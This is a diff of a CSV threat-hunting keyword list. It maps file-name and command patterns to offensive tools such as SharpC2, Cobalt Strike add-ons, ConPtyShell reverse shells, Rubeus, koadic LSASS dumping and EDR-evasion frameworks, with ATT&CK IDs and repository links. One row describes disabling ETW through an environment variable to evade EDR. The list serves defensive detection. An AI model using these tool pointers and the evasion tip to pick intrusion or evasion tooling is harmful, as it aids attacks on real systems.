"*Commands/PsExecCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/RevToSelf.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 
- T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
@@ -8677,41 +8825,41 @@ "*Commands/Shell.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShInject.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/ShSpawn.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*Commands/Silver.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*Commands/StealToken.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/StopDrone.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/TakeScreenshot.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WhoAmI.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WinRmCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Commands/WmiCommand.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4034","781","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" +"*commixproject/commix*","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/commixproject/commix","1","1","N/A","N/A","10","4035","782","2023-09-29T06:39:41Z","2015-03-20T08:38:26Z" "*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","1","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" "*common.ReflectiveDLL*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" 
+"*common_passwords.txt*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","1","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*commonspeak_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*comnap_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*comnode_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" 
-"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*completedns-get-ns-history*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*COMPlus_ETWEnabled=0\0\0\0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*comsvcs_lsass*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*ComsvcsLSASS*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules 
Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*Confuser.CLI.Exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" 
+"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*connormcgarr/tgtdelegation*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation 
tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*-consoleoutput -Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-consoleoutput 
-Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*contact_harvester*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ContainYourself.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourself.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" 
